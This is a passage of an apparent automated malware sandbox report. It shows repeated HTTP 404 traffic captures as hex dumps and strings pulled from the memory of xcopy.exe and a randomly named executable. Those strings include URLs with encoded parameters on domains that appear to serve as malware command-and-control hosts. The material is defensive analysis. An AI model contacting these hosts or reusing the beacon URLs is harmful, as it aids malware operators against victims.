            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 15:30:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0llpqkA%2FTAwZFbksLlzTbj5qR2ADcjR2524s1VPBEJKWrs33i6Pm8js2MKVDB6rbgaTqkTavckumynO2hmyH0CXPBOlVINuhKFqbbdgzU90ol2lqMqL80RsIAu5SZseiOXcjbwoOi80%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e280a5c7adf6c4c-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1131&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=705&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 15:30:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MJ%2B3Yp2XLrqmDO1CZZCLi6hE%2FoClQted0Y0s4zA99oPKxrWw9006VgpK73xu4NmSe%2FwrQzJ%2BOBjU1bdJXJPr4VKkSpMjmM%2F3Zuxps%2Fatz0ojkRjOnmsvALSSj94pRqIrLL53aDi3pHs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e280a6c6af06996-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1103&sent=3&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10787&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 15:30:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J5PuocNzb0Rjcst5nDRGQs9GTOY%2FcETRd61QuqRFbj%2F7Ma5RNEjO9lXPdxz01pkTdzwvVwM5RjnQ%2FiSEEVGuW90foW25RHBZZAW91jTAjHLh%2FGC9tc7CUlWGTS5MwQWvfnT19f3JqZI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e280a7c4ecb4662-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1088&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=416&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 14 Nov 2024 15:30:13 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 14 Nov 2024 15:30:13 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 14 Nov 2024 15:30:13 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 14 Nov 2024 15:30:16 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 14 Nov 2024 15:30:18 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 14 Nov 2024 15:30:21 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 15:30:42 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 32 76 68 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /2vhi/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 15:30:44 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 32 76 68 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /2vhi/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 15:30:47 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 32 76 68 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /2vhi/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 15:30:49 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 32 76 68 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /2vhi/ was not found on this server.</p></body></html>
            Source: xcopy.exe, 00000005.00000002.4153994919.00000000049EC000.00000004.10000000.00040000.00000000.sdmp, pQIuyzclQg.exe, 00000007.00000002.4153187157.000000000356C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://estrela-b.online/62tt/?vva=cTUXfXqHQ4cd-Hh0&n8C0=2eR3StT9zNfU5ywXH53OhrDvihvJYCZlVhDhLCkeE
            Source: xcopy.exe, 00000005.00000002.4153994919.0000000004B7E000.00000004.10000000.00040000.00000000.sdmp, pQIuyzclQg.exe, 00000007.00000002.4153187157.00000000036FE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://meanttobebroken.org/zdt7/?n8C0=OdyTsfpKOp
            Source: pQIuyzclQg.exe, 00000007.00000002.4154874640.0000000004FC9000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.robotcurut.xyz
            Source: pQIuyzclQg.exe, 00000007.00000002.4154874640.0000000004FC9000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.robotcurut.xyz/37zt/
            Source: xcopy.exe, 00000005.00000002.4155874511.0000000008268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: xcopy.exe, 00000005.00000002.4155874511.0000000008268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: xcopy.exe, 00000005.00000002.4155874511.0000000008268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
